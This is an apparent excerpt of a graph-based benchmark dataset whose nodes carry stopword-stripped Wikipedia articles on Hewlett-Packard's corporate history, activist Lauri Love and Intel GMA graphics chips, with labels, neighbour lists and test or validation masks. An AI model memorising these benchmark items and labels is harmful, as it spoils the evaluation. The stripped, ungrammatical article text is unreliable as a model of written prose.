overtake competitor ibm may 13 2008 hp electronic data systems eds announced signed definitive agreement hp would purchase eds june 30 hp announced waiting period hart-scott-rodino antitrust improvements act 1976 expired transaction still requires eds stockholder approval regulatory clearance european commission non-u.s. jurisdictions subject satisfaction waiver closing conditions specified merger agreement agreement finalized august 26 2008 13 billion publicly announced eds would re-branded eds hp company first targeted layoff 24,600 former eds workers announced september 15 2008 company 2008 annual report gave number 24,700 completed end 2009 round factored purchase price 19.5 billion liability goodwill september 23 2009 eds known hp enterprise services november 11 2009 3com hewlett-packard announced hewlett-packard would acquiring 3com 2.7 billion cash acquisition one biggest size among series takeovers acquisitions technology giants push way become one-stop shops since beginning financial crisis 2007 tech giants constantly felt pressure expand beyond current market niches dell purchased perot systems recently invade technology consulting business area previously dominated ibm hewlett-packard latest move marked incursion enterprise networking gear market dominated cisco april 28 2010 palm inc. hewlett-packard announced hp would buy palm 1.2 billion cash debt announcement rumored either htc dell research motion hp would buy palm adding palm handsets hp product line created overlap ipaq series mobile devices thought significantly improve hp mobile presence ipaqdevices selling well buying palm gave hp library valuable patents well mobile operating platform known webos july 1 2010 acquisition palm final purchase palm webos began big gamble – build hp ecosystem july 1 2011 hp launched first tablet named hp touchpad bringing webos tablet devices september 2 2010 hp bidding war 3par 33 share offer 2.07 billion dell declined match hp acquisition palm phased compaq brand august 6 2010 ceo mark hurd resigned amid controversy cfo cathie lesjak assumed role interim ceo hurd turned hp around widely regarded one silicon valley star ceos leadership hp became largest computer company world measured total revenue accused sexual harassment colleague allegations deemed baseless investigation led questions concerning 1000 20000 private expenses lack disclosure related friendship observers argued hurd innocent board asked resignation avoid negative pr public analysis divided saw commendable tough action hp handling expenses irregularities saw ill-advised hasty expensive reaction ousting remarkably capable leader turned business around hp hurd oversaw series acquisitions worth 20 billion allowed company expand services networking equipment smartphones shares hp dropped 8.4 after-hours trading hitting 52-week low 9 billion market capitalization shaved larry ellison publicly attacked hp board ousting stating hp board made worst personnel decision since idiots apple board fired steve jobs many years ago september 30 2010 léo apotheker named hp new ceo president apotheker appointment sparked strong reaction oracle chief executive larry ellison complained apotheker charge sap one subsidiaries systematically stealing software oracle sap accepted subsidiary closed illegally accessed oracle intellectual property following hurd departure hp seen market problematic margins falling failed redirect establish major new markets cloud mobile services apotheker strategy broadly aim disposing hardware moving profitable software services sector august 18 2011 hp announced would strategically exit smartphone tablet computer business focusing higher-margin strategic priorities cloud solutions software emphasis enterprise commercial government markets also contemplated selling personal computer division spinning separate company quitting 'pc business continuing sell servers equipment business customers strategy already undertaken ibm 2005 hp stock continued drop 40 including 25 one day august 19 2011 company abruptly announced number decisions discontinue webos device business mobile phones tablet computers intent sell personal computer division time hp largest personal computer manufacturer world acquire british big data software firm autonomy 79 premium seen externally absurdly high price business known concerns accounts media analysts described hp actions botched strategy shift chaotic attempt rapidly reposition hp enhance earnings ultimately cost apotheker job autonomy acquisition objected even hp cfo september 22 2011 hp board directors fired apotheker chief executive effective immediately replaced fellow board member former ebay chief meg whitman raymond j lane executive chairman though apotheker served barely ten months received 13 million compensation hp lost 30 billion market capitalization tenure weeks later hp announced review concluded pc division integrated critical business operations company reaffirmed commitment personal systems group year later november 2012 wrote-down almost 9 billion related autonomy acquisition see takeover autonomy became subject intense litigation hp accused autonomy previous management fraudulently exaggerating autonomy financial position called law enforcement regulators countries autonomy previous management accused hp textbook obfuscation finger pointing protect hp executives criticism conceal hp culpability prior knowledge autonomy financial position gross mismanagement autonomy acquisition march 21 2012 hp said printing pc divisions would become one unit headed todd bradley pc division printing chief vyomesh joshi leaving company may 23 2012 hp announced plans lay approximately 27,000 employees posting profit decline 31 second quarter 2012 profit decline account growing popularity smart phones tablets mobile devices slowed sale personal computers may 30 2012 hp unveiled first net zero energy data center hp data center plans use solar energy renewable sources instead traditional power grids july 10 2012 hp server monitoring software discovered previously unknown security vulnerability security warning given customers two vulnerabilities patch released one month later hp official site training center hacked defaced pakistani hacker known 'hitcher demonstrate web vulnerability september 10 2012 hp revised restructuring figures cutting 29,000 jobs hp already cut 3,800 jobs – around 7 percent revised 29,000 figure – july 2012 december 31 2013 hp revised number jobs cut 29,000 34,000 october 2014 current number jobs cut end 2013 24,600 end 2013 company 317,500 employees may 22 2014 hp announced would cut 11,000 16,000 jobs addition 34,000 announced 2013 gradually shaping hp nimble lower-cost customer partner-centric company successfully compete across rapidly changing landscape ceo meg whitman said time june 2014 hp discover customer event las vegas meg whitman martin fink announced project radically new computer architecture called machine based memristors silicon photonics machine supposed come commercialization end decade meanwhile representing 75 research activity hp labs october 6 2014 hewlett-packard announced planning split two separate companies separating personal computer printer businesses technology services split first reported wall street journal confirmed media would result two publicly traded companies hewlett packard enterprise hp inc. meg whitman would serve chairman hp inc. ceo hewlett packard enterprise patricia russo would chairman enterprise business dion weisler would ceo hp inc. october 29 2014 hewlett-packard announced new sprout personal computer may 2015 company announced would selling controlling 51 percent stake chinese data-networking business tsinghua unigroup fee least 2.4 billion november 1 2015 previously announced hewlett-packard changed name hp inc. spun hewlett packard enterprise new publicly traded company hp inc. retains hewlett-packard stock price history stock ticker symbol hewlett packard enterprise trades symbol hp global operations directed headquarters palo alto california usa u.s. operations directed facility unincorporated harris county texas near houston latin america offices unincorporated miami-dade county florida u.s. near miami europe offices meyrin switzerland near geneva also research center paris-saclay cluster 20 km south paris france asia-pacific offices singapore also large operations leixlip ireland austin texas boise idaho corvallis oregon fort collins colorado roseville california saint petersburg florida san diego california tulsa oklahoma vancouver washington conway arkansas plano texas former headquarters eds hp acquired uk hp based large site bracknell berkshire offices various uk locations including landmark office tower london 88 wood street recent acquisition 3com expand employee base marlborough massachusetts company also large workforce numerous offices bucharest romania bangalore india address back end operations mphasis headquartered bangalore also enabled hp increase footprint city subsidiary eds company acquired hp produces lines printers scanners digital cameras calculators pdas servers workstation computers computers home small-business use many computers came 2002 merger compaq hp promotes supplying hardware software also full range services design implement support infrastructure hp imaging printing group ipg described company 2005 leading imaging printing systems provider world printer hardware printing supplies scanning devices providing solutions across customer segments individual consumers small medium businesses large enterprises products technology associated ipg include december 23 2008 hp released iprint photo iphone free downloadable software application allows printing 4 x 6 photos hp personal systems group psg claims one leading vendors personal computers pcs world based unit volume shipped annual revenue psg deals hp resold apple ipod november 2005 hp enterprise business eb incorporates hp technology services enterprise services amalgamation former eds known hp services hp enterprise security services oversees professional services network security information security information assurance/ compliancy hp software division enterprise servers storage networking group essn enterprise servers storage networking group essn oversees back end products like storage servers hp networking former procurve responsible nw family products business unit essn hp software division company enterprise software unit years hp produced marketed brand enterprise-management software hp openview september 2005 hp purchased several software companies part publicized deliberate strategy augment software offerings large business customers hp software sells several categories software including hp software also provides software service saas cloud computing solutions software services including consulting education professional services support hp office strategy technology four main functions office strategy technology comes hp labs research arm hp founded 1966 hp labs aims deliver new technologies create business opportunities go beyond hp current strategies examples recent hp labs technology includes memory spot chip 2006 hp idealab provides web forum early-state innovations encourage open feedback consumers development community hp also offers managed services provide complete it-support solutions companies organizations examples include founders developed management style came known hp way hewlett words hp way core ideology ... includes deep respect individual dedication affordable quality reliability commitment community responsibility view company exists make technical contributions advancement welfare humanity following tenets hp way july 2007 company announced met target set 2004 recycle one billion pounds electronics toner ink cartridges set new goal recycling two billion pounds hardware end 2010 2006 company recovered 187 million pounds electronics 73 percent closest competitor 2008 hp released supply chain emissions data — industry first september 2009 newsweek ranked hp 1 2009 green rankings america 500 largest corporations according environmentalleader.com hewlett-packard earned number one position due greenhouse gas ghg emission reduction programs first major company report ghg emissions associated supply chain according ranking addition hp made effort remove toxic substances products though greenpeace targeted company better hp took top spot corporate responsibility magazine 100 best corporate citizens list 2010 list cited pr week one america important business rankings hp beat russell 1000 index companies leadership seven categories including environment climate changes corporate philanthropy 2009 hp ranked fifth fortune magazine named hp one world admired companies 2010 placing 2 computer industry 32 overall list top 50 year computer industry hp ranked 1 social responsibility long-term investment global competitiveness use corporate assets may 2011 hp released global responsibility report covering accomplishments 2010 report company tenth provides comprehensive view hp global citizenship programs performance goals describes hp uses technology influence expertise make positive impact world company 2009 report best corporate responsibility report year 2009 reports claims hp decreased total energy use 9 percent compared 2008 hp recovered total 118,000 tonnes electronic products supplies recycling 2009 including 61 million print cartridges april 2010 san francisco chronicle article hp one 12 companies commended designing products safe start following principles green chemistry commendations came environment california environmental advocacy group praised select companies golden state bay area efforts keep planet clean green may 2010 hp named one world ethical companies ethisphere institute second year row hp made list ethisphere reviewed researched analyzed thousands nominations 100 countries 35 industries create 2010 list hp one 100 companies earn distinction top winner computer hardware vendor recognized ethisphere honors firms promote ethical business standards practices going beyond legal minimums introducing innovative ideas benefit public hp listed greenpeace guide greener electronics ranks electronics manufacturers according policies sustainability energy climate green products november 2011 hp secured 1st place 15 ranking climbing 3 places increased score 5.9 5.5 scored points new sustainable operations criteria best program measuring reducing emissions greenhouse gases suppliers scoring maximum points thorough paper procurement policy november 2012 report hp ranked second score 5.7 hp especially well disclosure externally verified greenhouse gas emissions setting targets reducing however greenpeace reports hp risks penalty point future editions due fact member trade associations commented energy efficiency standards hp earned recognition work area data privacy security 2010 company ranked 4 ponemon institute annual study trusted companies privacy since 2006 hp worked directly u.s. congress federal trade commission ftc department commerce establish new strategy federal legislation hp played key role work toward december 2010 ftc report protecting consumer privacy era rapid change winning nine straight annual respected company china awards economic observer peking university hp china added 10 year contribution award list accolades award aims identify companies business china outstanding sustained performance business operations development corporate social responsibility 2012 rankings consumer electronics companies progress relating conflict minerals enough project rated hp second 24 companies calling pioneer progress according businessweek study hp world 11th valuable brand 2009 hp many sponsorships one well known sponsorship epcot walt disney world resort 1995 1999 2013 hp shirt sponsor premier league club tottenham hotspur f.c 1997 1999 sponsors australian football league club north melbourne football club also sponsored bmw williams formula 1 team 2005 sponsorship formerly held compaq 2010 sponsor renault f1 hewlett-packard also naming rights arrangement hp pavilion san jose home san jose sharks nhl hockey team 2013 arena naming rights acquired sap ag renaming arena sap center san jose company also maintains number corporate sponsorships business sector including sponsorships trade organisations including fespa print trade exhibitions o'reilly media velocity web development conference acquisition compaq 2002 hp maintained compaq presario brand low-end home desktops laptops hp compaq brand business desktops laptops hp proliant brand intel-architecture servers hp pavilion brand used home entertainment laptops home desktops tandem nonstop servers branded hp integrity nonstop march 2003 hp restated first-quarter cash flow operations reducing 18 percent accounting error actual cash flow operations 647 million 791 million reported earlier hp shifted 144 million net cash used investing activities september 5 2006 shawn cabalfin david o'neil newsweek wrote hp general counsel behest chairwoman patricia dunn contracted team independent security experts investigate board members several journalists order identify source information leak turn security experts recruited private investigators used spying technique known pretexting pretexting involved investigators impersonating hp board members nine journalists including reporters cnet new york times wall street journal order obtain phone records information leaked related hp long-term strategy published part cnet article january 2006 hp employees accused criminal acts since acquitted november 2007 hewlett-packard released bios update covering wide range laptops intent speed computer fan well run constantly whether computer reason prevent overheating defective nvidia graphics processing units gpus shipped many original equipment manufacturers including hewlett-packard dell apple defect concerned new packaging material used nvidia 2007 onwards joining graphics chip onto motherboard perform well thermal cycling prone develop stress cracks – effectively severing connection gpu motherboard leading blank screen july 2008 hp issued extension initial one-year warranty replace motherboards selected models however option extended models defective nvidia chipsets despite research showing computers also affected fault furthermore replacement motherboard temporary fix since fault inherent units affected models point manufacture including replacement motherboards offered hp free 'repair since point several websites documenting issue notably www.hplies.com forum dedicated refer hewlett-packard multi-million dollar cover issue www.nvidiadefect.com details specifics fault offers advice owners affected computers several small-claims lawsuits filed several states well suits filed countries hewlett-packard also faced class-action lawsuit 2009 i7 processor computers complainants stated systems locked within 30 minutes powering consistently even replaced newer i7 systems lockups continued june 15 2011 hp filed lawsuit california superior court santa clara claiming oracle corporation breached agreement support itanium microprocessor used hp high-end enterprise servers june 15 2011 hp sent formal legal demand letter oracle attempt force world 3 software maker reverse decision discontinue software development intel itanium microprocessor build servers hp lawsuit 2012 requiring oracle continue produce software compatible itanium processor hp awarded 3 billion damages oracle june 30 2016 hp argued oracle canceling support damaged hp itanium server brand oracle announced appeal decision damages november 2012 hp recorded writedown around 8.8 billion related acquisition year earlier uk based autonomy corporation plc hp accused autonomy deliberately inflating value company prior takeover former management team autonomy flatly rejected charge autonomy specialized analysis large scale unstructured big data 2010 uk largest successful software business maintained aggressively entrepreneurial marketing approach controls described rod iron said include zero tolerance firing weakest 5 sales force quarter compensating best sales staff like rock stars time hp fired previous ceo expenses irregularities year appointed léo apotheker ceo president hp seen problematic market margins falling failed redirect establish major new markets cloud mobile services apotheker strategy aim disposing hardware moving profitable software services sector part strategy autonomy acquired hp october 2011 hp paid 10.3 billion 87.3 shares valuing autonomy around 11.7 billion £7.4 billion overall premium around 79 market price deal widely criticized absurdly high botched strategy shift chaotic attempt rapidly reposition hp enhance earnings objected even hp cfo within year apotheker fired major culture clashes became apparent hp written 8.8 billion autonomy value hp claim resulted accounting improprieties misrepresentations disclosure failures previous management turn accuse hp textbook example defensive stalling conceal evidence prior knowledge gross mismanagement undermining company noting public awareness since 2009 financial reporting issues even hp cfo disagreed price paid external observers generally state small part write-off appears due accounting mis-statements hp overpaid businesses previously serious fraud office united kingdom u.s. securities exchange commission joined fbi investigating potential anomalies hp incurred much damage stock falling decades low three lawsuits brought shareholders hp fall value hp shares august 2014 united states district court judge threw proposed settlement autonomy previous management argued would collusive intended divert scrutiny hp responsibility knowledge essentially engaging plaintiff attorneys existing cases redirecting previous autonomy vendors management fee 48 million plaintiffs agreeing end claims hp management similarly redirect claims previous autonomy vendors management january 2015 sfo closed investigation likelihood successful prosecution low dispute still litigated us investigated uk ireland financial reporting council june 9 2015 hp agreed pay 100 million investors bought hp shares august 19 2011 november 20 2012 settle suite autonomy purchase october 25 2012 richard falk human rights council special rapporteur situation human rights palestinian territories occupied since 1967 called boycotting hp together businesses profiting israeli settlements occupied palestinian lands brought operations line international human rights humanitarian law 2014 presbyterian church voted move forward divestment hp protest israeli policies toward palestinians 2015 city portland human rights commission requested place caterpillar g4s hewlett-packard motorola solutions city buy list april 9 2014 administrative proceeding securities exchange commission settled hp consenting order acknowledging hp violated foreign corrupt practices act fcpa hp subsidiaries russia poland mexico made improper payments government officials obtain retain lucrative public contracts sec order finds hp subsidiary russia paid 2 million agents various shell companies russian government official retain multimillion-dollar contract federal prosecutor office poland hp subsidiary provided gifts cash bribes worth 600,000 polish government official obtain contracts national police agency part bid win software sale mexico state-owned petroleum company hp subsidiary mexico paid 1 million inflated commissions consultant close ties company officials money funneled one officials hp agreed pay 108 million settle sec charges parallel criminal case",
    "neighbors": [
      9732,
      1029,
      6661,
      1032,
      4622,
      9742,
      7698,
      1555,
      3603,
      3605,
      4628,
      2071,
      5144,
      5145,
      7188,
      8212,
      8725,
      8733,
      2078,
      7199,
      1056,
      9756,
      6178,
      10272,
      1572,
      1061,
      7204,
      8229,
      10277,
      9258,
      10797,
      9774,
      5681,
      7218,
      7729,
      8756,
      5689,
      58,
      1083,
      8763,
      5185,
      6722,
      9795,
      1606,
      3142,
      2120,
      4166,
      7752,
      7243,
      11337,
      8792,
      5210,
      4194,
      7267,
      2149,
      1638,
      5733,
      6248,
      7269,
      8295,
      2155,
      6765,
      8301,
      5232,
      7281,
      118,
      7286,
      10871,
      7291,
      5756,
      125,
      6780,
      1663,
      8315,
      9344,
      11391,
      2179,
      4741,
      5767,
      2184,
      7303,
      6282,
      7307,
      142,
      3214,
      4751,
      9363,
      2196,
      10389,
      1177,
      8352,
      6818,
      4259,
      5285,
      1702,
      8871,
      9894,
      170,
      5803,
      172,
      684,
      6830,
      9391,
      3760,
      10926,
      1722,
      1725,
      8899,
      1224,
      6344,
      7880,
      1741,
      4813,
      4816,
      3281,
      2258,
      1750,
      2266,
      1755,
      9946,
      1761,
      2788,
      9449,
      2282,
      1260,
      9452,
      9455,
      8944,
      4337,
      9970,
      11505,
      3323,
      253,
      1278,
      3328,
      5378,
      7939,
      2308,
      7941,
      11010,
      7946,
      11019,
      780,
      3340,
      9488,
      1304,
      9498,
      9499,
      8478,
      6434,
      7970,
      292,
      2855,
      1832,
      6447,
      7983,
      4916,
      8501,
      823,
      1335,
      7992,
      10553,
      3904,
      6977,
      8515,
      5956,
      3909,
      11075,
      3911,
      9031,
      11082,
      2379,
      1358,
      7504,
      6993,
      1874,
      4438,
      4954,
      2395,
      4444,
      11100,
      10590,
      9057,
      3938,
      10596,
      8551,
      1387,
      11118,
      11631,
      2416,
      6514,
      3443,
      2420,
      3445,
      6006,
      1400,
      10104,
      11644,
      9086,
      9599,
      3458,
      3974,
      7049,
      5518,
      5519,
      11151,
      403,
      5523,
      3477,
      10646,
      7576,
      1952,
      5028,
      10151,
      936,
      425,
      10669,
      11694,
      6575,
      11184,
      2995,
      8628,
      10675,
      3510,
      953,
      6585,
      1469,
      10686,
      7616,
      5571,
      3524,
      10692,
      1480,
      8136,
      9163,
      465,
      5073,
      467,
      2519,
      2008,
      8668,
      6110,
      7134,
      7649,
      6632,
      8170,
      1515,
      3563,
      3053,
      9706,
      3055,
      10223,
      6129,
      5619,
      9720,
      9723,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 5385,
    "label": 4,
    "text": "Lauri_Love:lauri love lauri love born 14 december 1984 united kingdom british activist charged stealing data united states government computers including united states army missile defense agency nasa via computer intrusion love stradishall suffolk parents alexander love prison chaplain hm prison highpoint north sirkka-liisa love finnish citizen also works prison live stradishall dual citizenship united kingdom finland dropping sixth form college working turkey plant love applied finnish passport served finnish army six months became conscientious objector finished another six months obligation alternative civilian service applied university nottingham england dropped second term physical mental collapse university glasgow scotland dropped second year health reasons part 2011 hetherington house occupation student protest glasgow university love indictment united states 2013 district new jersey 2014 southern district new york eastern district virginia allegedly breaching thousands computer systems united states elsewhere – including computer networks federal agencies – steal massive quantities confidential data united states attempted extradite face charges love american attorney tor ekeland love two day extradition hearing 28 29 june 2016 westminster magistrates court london father testified lauri love asperger syndrome extradited also hearing simon baron-cohen psychologist testified love extradited diagnosed disorders also include eczema psychosis depression love lives home parents baron-cohen stated love told would commit suicide extradited love father testified son diagnosed autism adult serving finnish army baron-cohen diagnosed love asperger syndrome 2012 love end 20s love testified extradition hearing 29 june 2016 suggested court love family crafted media strategy garner public support extradition love supported courage foundation love barrister extradition hearing ben cooper doughty street chambers case adjourned 16 september 2016 westminster magistrates court judge ruled love could extradited united states love solicitor karen todner said would appeal 5 february 2018 lord chief justice lord burnett mr justice ouseley high court upheld appeal extradition ruling would oppressive prosecute mr love england offences national crime agency nca arrested love 2013 february 2015 bbc news revealed love taking legal action return computers seized nca arrested may 2016 judge nina tempia westminster magistrates court ruled love tell nca passwords encryption keys january 2018 announced novelist frederick forsyth would publish novel inspired lauri love gary mckinnon stories",
    "neighbors": [
      9240,
      5426
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5386,
    "label": 3,
    "text": "Intel_GMA:intel gma intel graphics media accelerator gma series integrated graphics processors introduced 2004 intel replacing earlier intel extreme graphics series succeeded intel hd iris graphics series series targets market low-cost graphics solutions products series integrated onto motherboard limited graphics processing power use computer main memory storage instead dedicated video memory commonly found netbooks low-priced laptops desktop computers well business computers need high levels graphics capability early 2007 90 pc motherboards sold integrated gpu gma line gpus replaces earlier intel extreme graphics intel740 line latter discrete unit form agp pci cards technology evolved companies real3d lockheed martin later intel integrated i740 core intel 810 chipset original architecture gma systems supported functions hardware relied host cpu handle least graphics pipeline decreasing performance however introduction intel 4th generation gma architecture gma x3000 2006 many functions built hardware providing increase performance 4th generation gma combines fixed function capabilities threaded array programmable executions units providing advantages graphics video performance many advantages new gma architecture come ability flexibly switch needed executing graphics-related tasks video-related tasks gma performance widely criticized past slow computer games sometimes nicknamed intel gmd graphics media decelerator essentially referred world first graphics decelerator since s3 virge latest gma generation ease many concerns casual gamer despite similarities intel main series gma integrated graphics processors igps based powervr technology intel licensed imagination technologies intel used low-power powervr mbx designs chipsets supporting xscale platform since sale xscale 2006 licensed powervr sgx used gma 500 igp use atom platform introduction platform controller hub graphics media accelerator series ceased cpu-based intel hd iris graphics series created gma 900 first graphics core produced intel graphics media accelerator product name incorporated intel 910g 915g 915gx chipsets 3d architecture gma 900 significant upgrade previous extreme 3d graphics processors 4 pixel per clock cycle design supporting directx 9 pixel shader model 2.0 operates clock rate ranging 160 333 mhz depending particular chipset 333 mhz peak pixel fill-rate 1332 megapixels per second however architecture still lacks support hardware transform lighting similar vertex shader technologies like previous intel integrated graphics parts gma 900 hardware support mpeg-2 motion compensation color-space conversion directdraw overlay processor uses different separate clock generators display render cores display unit includes 400 mhz ramdac two 25–200 mpixel/s serial dvo ports two display controllers mobile chipsets two 18-bit 25–112 mhz lvds transmitters included gma 950 second graphics core produced intel graphics media accelerator product name incorporated intel 945g chipsets processor includes 400 mhz 256-bit core supporting 10.6 gb/s memory bandwidth ddr2-667 system ram 224 mb max video memory dvmt scheme 1.6 gpixels/s 1.6 gtexels/s fill rate max resolution 2048x1536 analog digital displays 2 sdvo ports flat-panels and/or tv-out via add2 cards media expansion cards 3d-wise gma 950 supports four pixels per clock rendering microsoft directx 9.0 hardware acceleration vertex shader 3.0 opengl 1.4 arb extensions windows integrated graphics found q33 q35 g31 g33 chipsets supports pixel shader 2.0 opengl 1.4 hardware vertex shader n't supported found intel atom d4xx d5xx n4xx n5xx codenamed pineview processors like gma 3100 gma 3000 close relative gma900/950 completely different gma x3000 series supports 384 mb video memory windows xp driver directx 9.0c shader model 2.0 opengl 1.4 microsoft windows opengl 2.1 linux 946gz q963 q965 chipsets use gma 3000 graphics core gma 3000 3d core different x3000 despite similar names based directly previous generation gma 900 gma 950 graphics belonging i915 family pixel vertex shaders support shader model 2.0b features vertex shaders still software-emulated addition hardware video acceleration hardware-based idct computation procamp video stream independent color correction vc-1 decoding implemented hardware gma 3000-equipped chipsets q965 retains dual independent display support core speed rated 400 mhz 1.6 gpixel/s fill rate datasheets listed 667 mhz core white paper memory controller address maximum 256 mb system memory integrated serial dvo ports increased top speed 270 mpixel/s gma x3000 desktop substantially redesigned compared previous gma iterations used intel g965 north bridge controller gma x3000 launched july 2006 gma x3000 underlying 3d rendering hardware organized unified shader processor consisting 8 scalar execution units pipeline process video vertex texture operations central scheduler dynamically dispatches threads pipeline resources maximize rendering throughput decrease impact individual pipeline stalls however due scalar nature execution units process data single pixel component time gma x3000 supports directx 9.0 vertex pixel shader model 3.0 features processor consists different clock domains meaning entire chip operate clock speed causes difficulty measuring peak throughput various functions adding confusion listed 667 mhz intel g965 white paper listed 400 mhz intel g965 datasheet various rules define igp processing capabilities memory controller address maximum 384 mb memory according white paper 256 mb datasheet gma x3500 upgrade gma x3000 used desktop g35 shaders support shader model 4.0 features architecturally gma x3500 similar gma x3000 graphics cores running 667 mhz major difference gma x3500 supports shader model 4.0 directx 10 whereas earlier x3000 supports shader model 3.0 directx 9 x3500 also adds hardware-assistance playback vc-1 video gma x3100 mobile version gma x3500 used intel gl960/gm965 chipsets also gs965 chipset x3100 supports hardware transform lighting eight programmable shader units 384 mb video memory display cores run 333 mhz gm965 320 mhz gl960 render cores run 500 mhz gm965 400 mhz gl960 x3100 display unit includes 300 mhz ramdac two 25–112 mhz lvds transmitters 2 dvo encoders tv encoder windows driver supports directx 10.0 shader model 4.0 opengl 1.5 linux opengl 2.1 supported integrated graphics found b43 q43 q45 chipsets gma x4500 gma x4500hd desktop platforms launched june 2008 gma x4500 used g43 chipset gma x4500hd used g45 chipset gma x4500 also used g41 chipset released september 2008 difference gma x4500 gma x4500hd gma x4500hd capable full 1080p high-definition video playback including blu-ray disc movies like x3500 x4500 supports directx 10 shader model 4.0 features intel designed gma x4500 200 faster gma 3100 g33 chipset 3dmark06 performance 70 faster gma x3500 g35 chipset gma 4500mhd laptops launched july 16 2008 featurewise 4500mhd identical desktop cousin x4500hd gma 4500mhd used gl40 gs40 gm45 gs45 chipsets gma x4700mhd laptops launched october 2008 last product intel gma way belongs 4500mhd series used gm47 chipsets montevina features 80 shading units 10 texture mapping units 1 rops compared 4500mhd frequency increased 640 mhz intel developed new set low power graphics architecture based powervr available linux drivers support much intel sch system controller hub codenamed poulsbo atom processor z5xx series features gma 500 graphic system rather developed in-house core powervr sgx 535 core licensed imagination technologies intel describes flexible programmable architecture supports shader-based technology 2d 3d advanced 3d graphics high-definition video decode image processing features include screen tiling internal true color processing zero overhead anti-aliasing programmable shader 3d accelerator 32-bit floating-point operations revised version previous intel sch system controller hub atom z6xx series cpu codenamed lincroft essentially graphic system gma 500 clocked double speed 200 mhz 400 mhz integrated graphics system released intel atom cedar trail 32 nm based powervr sgx545 unlike original powervr solution model clocked 400 mhz instead 200 mhz specifically found intel atom n2600 processor atom d2500 models supports directx version 9.0c similar gma 3600 version clocked 640 mhz found atom n2800 atom d2550 atom d2500 atom d2600 atom d2700 models supports directx version 9.0c protected audio video path pavp restricts data path within computer video playback e.g. blu-ray discs supported newer chipsets e.g intel g45 operating systems since windows vista pavp configured bios different modes supported default setting bios pavp lite within intel hd graphics successor intel gma similar technology called intel insider exists mac os x 10.4 supports gma 950 since used previous revisions macbook macmini 17-inch imacs used intel-based mac minis mac mini released march 3 2009 mac os x 10.5 leopard contains drivers gma x3100 used recent revision macbook range late-release versions mac os x 10.4 also support gma 900 due use apple developer transition kit used powerpc-to-intel transition however special modifications kext file must made enable core image quartz extreme although new macbook line longer uses x3100 mac os x 10.5 leopard ships drivers supporting require modifications kext file mac os x 10.6 snow leopard includes new 64-bit kernel addition 32-bit one include 64-bit x3100 drivers means although macbooks x3100 64-bit capable processors efi mac os x must load 32-bit kernel support 32-bit x3100 drivers november 9 10.6.2 update ships 64-bit x3100 drivers apple removed 64-bit gma x3100 drivers later thus affected macs forced back 32-bit kernel despite 64-bit clean terms hardware firmware 64-bit drivers offered os x lion subsequently os x mountain lion dropped 32-bit kernel booting combination two changes graphics driver code resulted many mac revisions unable upgrade mountain lion gpus replaced macbook macbook pro notebooks instead shipped far powerful nvidia geforce 9400m 15 17 macbook pro notebooks shipped additional geforce 9600gt supporting hybrid power switch gpus nvidia geforce 9400m chipset implemented apple macbooks support composite s-video output freebsd 8.0 supports following intel graphic chipsets i810 i810-dc100 i810e i815 i830m 845g 852gm 855gm 865g 915g 915gm 945g 945gm 965g 965q 946gz 965gm,945gme g33 q33 q35 g35 gm45 g45 q45 g43 g41 chipsets practice chipsets 4500mhd supported drm 3d using freebsd 9 work integrate gem kms currently adding support i-series integrated graphics improving support earlier chipsets august 2006 intel added support open-source x.org/xfree86 drivers latest 965 series include gma x 3000 core drivers developed intel tungsten graphics may 2007 version 2.0 driver xorg-video-intel released added support 965gm chipset addition 2.0 driver added native video mode programming support chipsets i830 forward version added support automatic video mode detection selection monitor hot plug dynamic extended merged desktops per-monitor screen rotation features built x.org 7.3 x server release eventually supported across open source x.org video drivers version 2.1 released july 2007 added support g33 q33 q35 chipsets g35 also supported linux driver common x.org drivers linux license combination gpl linux kernel parts mit parts drivers mainly developed intel tungsten graphics contract since chipsets documentation publicly available long time january 2008 intel released complete developer documentation time latest chipsets 965 g35 chipset allowing external developers involvement april 2009 intel released documentation newer g45 graphics including x4500 chipsets may 2009 intel employee eric anholt stated intel still working getting docs 8xx chipsets linux support hardware accelerated h.264 playback available working x4500hd x4500mhd using vaapi g45-h264 branch gma 500 gma 600 gma 3600 gma 3650 powervr based chips incompatible intel genx gpu architecture family intel supported foss drivers current available foss drivers included linux 3.3 onwards support 2d acceleration 3d acceleration ubuntu supports gma500 poulsbo ubuntu-mobile gma500 repositories launchpad support present experimental way 11.10 12.04 installation procedure simple drivers lead many bugs ubuntu 12.10 2d support included joli os linux-based os optimized netbooks driver gma500 built pixielive gnu/linux live distribution optimized gma500 netbooks boot usb pendrive sd card harddisk intel releases official linux drivers iegd intel embedded graphic driver supporting linux distributions dedicated embedded market november 2009 linux foundation released details new rewritten linux driver would support chipset intel upcoming chipsets direct rendering manager x.org parts would free software 3d component using gallium3d still proprietary oracle solaris 11 provides 64-bit video driver support following intel graphic chipsets i810 i810-dc100 i810e i815 i830m 845g 852gm/855gm 865g 915g e7221 i915 915gm 945g 945gm 945gme pineview gm pineview g 965g g35 965q 946gz 965gm 965gme/gle g33 q35 q33 gm45 4 series g45/g43 q45/q43 g41 b43 clarkdale arrandale sandybridge desktop gt1 sandybridge desktop gt2 sandybridge desktop gt2+ sandybridge mobile gt1 sandybridge mobile gt2 sandybridge mobile gt2+ ivybridge mobile gt1 ivybridge mobile gt2 ivybridge desktop gt1 ivybridge desktop gt2 ivybridge server gt1 ivybridge server gt2 solaris open-source community developers provide additional driver support intel hd graphics 4000/2500 graphic-based chipsets aka ivy bridge opengl 3.0/glsl 1.30 new libva/va-api library enabling hardware accelerated video decode prevailing coding standards today mpeg-2 mpeg-4 asp/h.263 mpeg-4 avc/h.264 vc-1/wmv3 gma 900 theoretically capable running windows vista aero interface certified directx 9 compliant however whql certified wddm driver made available presumably due lack hardware scheduler gpu intel gma 900 also first intel integrated gpu support drivers windows 9x operating systems including 98 many owners gma900 hardware believed would able run aero systems early release candidates vista permitted xddm drivers run aero intel however contends microsoft final specs aero/wddm certification permit releasing wddm driver gma900 due issues hardware scheduler mentioned final version vista released wddm driver released last minute pulling opengl capabilities gma drivers windows vista left large number gma based workstations unable perform basic 3d hardware acceleration opengl unable run many vista premium applications windows dvd maker windows 7 aero effects enabled vga compatibility driver via software rendering native gma900 drivers available windows 8 since xddm support removed operating system gma900 based laptops windows 7 users may experience serious bug related chipset native backlight control method failing change brightness resulting brightness becoming stuck particular value driver installation bug occur windows 7 initially released public commonly observed running windows update bug also occurs gma3150 based laptops igp capable displaying aero interface windows vista drivers shipped windows vista since beta versions became available mid-2006 also run windows 7 aero interface since intel released drivers windows 7 mid-june 2009 gma 950 integrated many netbooks built intel 945gse express chipset able display resolution 2048×1536 75 hz utilizing 224 mb shared memory reviews igp negative 